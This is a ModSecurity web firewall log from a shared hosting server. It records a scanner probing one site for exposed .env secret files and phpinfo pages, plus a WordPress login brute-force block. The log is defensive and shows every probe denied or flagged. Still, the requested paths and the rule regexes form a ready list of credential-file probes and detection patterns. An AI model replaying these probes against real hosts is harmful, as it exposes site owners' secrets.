[Tue May 26 14:50:02.653003 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzXgAAAPc"]
[Tue May 26 14:50:02.680348 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzYgAAAJc"]
[Tue May 26 14:50:02.687378 2026] [security2:error] [pid 648203:tid 648415] [client 45.148.10.95:17002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/front/.env"] [unique_id "ahVlwrEQDDtxJNiDrdTzbAAAANc"]
[Tue May 26 14:50:02.697911 2026] [security2:error] [pid 648203:tid 648413] [client 45.148.10.95:31808] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/frontend/.env"] [unique_id "ahVlwrEQDDtxJNiDrdTzbQAAANU"]
[Tue May 26 14:50:02.708746 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzZQAAAMU"]
[Tue May 26 14:50:02.728591 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzaAAAANs"]
[Tue May 26 14:50:02.740341 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:31648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/info.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzbgAAAJE"]
[Tue May 26 14:50:02.749387 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzawAAAKQ"]
[Tue May 26 14:50:02.779944 2026] [security2:error] [pid 648203:tid 648431] [client 45.148.10.95:31768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/infos.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzcgAAAOc"]
[Tue May 26 14:50:02.823232 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzcQAAAMI"]
[Tue May 26 14:50:02.830496 2026] [security2:error] [pid 648203:tid 648460] [client 45.148.10.95:31688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/laravel/.env"] [unique_id "ahVlwrEQDDtxJNiDrdTzewAAAQQ"]
[Tue May 26 14:50:02.847422 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:31808] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/lms/.env"] [unique_id "ahVlwrEQDDtxJNiDrdTzgAAAAL8"]
[Tue May 26 14:50:02.867458 2026] [security2:error] [pid 648203:tid 648425] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzdQAAAOE"]
[Tue May 26 14:50:02.871697 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzeAAAANw"]
[Tue May 26 14:50:02.887784 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:31842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/local/.env"] [unique_id "ahVlwrEQDDtxJNiDrdTzhgAAAK0"]
[Tue May 26 14:50:02.906709 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzfwAAAPs"]
[Tue May 26 14:50:02.937026 2026] [security2:error] [pid 648203:tid 648335] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzgwAAAIc"]
[Tue May 26 14:50:02.952531 2026] [security2:error] [pid 648203:tid 648444] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzigAAAPQ"]
[Tue May 26 14:50:02.976894 2026] [security2:error] [pid 648203:tid 648405] [client 195.178.110.34:44554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/website/.env"] [unique_id "ahVlwrEQDDtxJNiDrdTzjAAAAM0"]
[Tue May 26 14:50:03.072140 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzjwAAAMs"]
[Tue May 26 14:50:03.085393 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:31806] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzkAAAAMA"]
[Tue May 26 14:50:03.096463 2026] [security2:error] [pid 648203:tid 648371] [client 45.148.10.95:31886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/media/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzmgAAAKs"]
[Tue May 26 14:50:03.098113 2026] [security2:error] [pid 648203:tid 648435] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzkwAAAOs"]
[Tue May 26 14:50:03.126170 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzlgAAAOA"]
[Tue May 26 14:50:03.134109 2026] [security2:error] [pid 648203:tid 648367] [client 104.207.57.58:16085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.57.207.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlwrEQDDtxJNiDrdTziwAAAKc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:03.152339 2026] [security2:error] [pid 648203:tid 648432] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzmQAAAOg"]
[Tue May 26 14:50:03.192170 2026] [security2:error] [pid 648203:tid 648353] [client 45.148.10.95:31638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/infophp.php"] [unique_id "ahVlw7EQDDtxJNiDrdTznAAAAJk"]
[Tue May 26 14:50:03.241656 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:31838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/new/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzpgAAAJs"]
[Tue May 26 14:50:03.246208 2026] [security2:error] [pid 648203:tid 648430] [client 45.148.10.95:31842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/node-api/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzpwAAAOY"]
[Tue May 26 14:50:03.249365 2026] [security2:error] [pid 648203:tid 648412] [client 45.148.10.95:31886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/market/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzqAAAANQ"]
[Tue May 26 14:50:03.262114 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTznwAAAKE"]
[Tue May 26 14:50:03.266707 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:17002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/node/api/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzqgAAAJc"]
[Tue May 26 14:50:03.291191 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzogAAALA"]
[Tue May 26 14:50:03.298855 2026] [security2:error] [pid 648203:tid 648381] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzpQAAALU"]
[Tue May 26 14:50:03.326301 2026] [security2:error] [pid 648203:tid 648427] [client 45.148.10.95:31704] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/marketing/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzrgAAAOM"]
[Tue May 26 14:50:03.360800 2026] [security2:error] [pid 648203:tid 648450] [client 45.148.10.95:31888] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/nodeapi/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzsQAAAPo"]
[Tue May 26 14:50:03.363786 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:31944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/nodeweb/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzsgAAANA"]
[Tue May 26 14:50:03.391610 2026] [security2:error] [pid 648203:tid 648416] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzsAAAANg"]
[Tue May 26 14:50:03.477334 2026] [security2:error] [pid 648203:tid 648414] [client 45.148.10.95:31912] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/node/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzvQAAANY"]
[Tue May 26 14:50:03.485416 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzuQAAAKk"]
[Tue May 26 14:50:03.488516 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzuwAAAMI"]
[Tue May 26 14:50:03.494976 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:31818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/opt/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzvgAAAL8"]
[Tue May 26 14:50:03.570317 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:31920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/node/backend/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzygAAAK0"]
[Tue May 26 14:50:03.578615 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzwgAAALI"]
[Tue May 26 14:50:03.579690 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzxAAAANw"]
[Tue May 26 14:50:03.602964 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzxwAAALk"]
[Tue May 26 14:50:03.633268 2026] [security2:error] [pid 648203:tid 648335] [client 45.148.10.95:32004] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/old/.env"] [unique_id "ahVlw7EQDDtxJNiDrdTzzwAAAIc"]
[Tue May 26 14:50:03.639876 2026] [security2:error] [pid 648203:tid 648441] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzzgAAAPE"]
[Tue May 26 14:50:03.643129 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTzzAAAALw"]
[Tue May 26 14:50:03.738144 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTz1AAAAMA"]
[Tue May 26 14:50:03.794904 2026] [security2:error] [pid 648203:tid 648337] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTz2gAAAIk"]
[Tue May 26 14:50:03.795212 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTz2QAAAKY"]
[Tue May 26 14:50:03.855453 2026] [security2:error] [pid 648203:tid 648367] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTz3QAAAKc"]
[Tue May 26 14:50:03.914672 2026] [security2:error] [pid 648203:tid 648349] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTz5AAAAJU"]
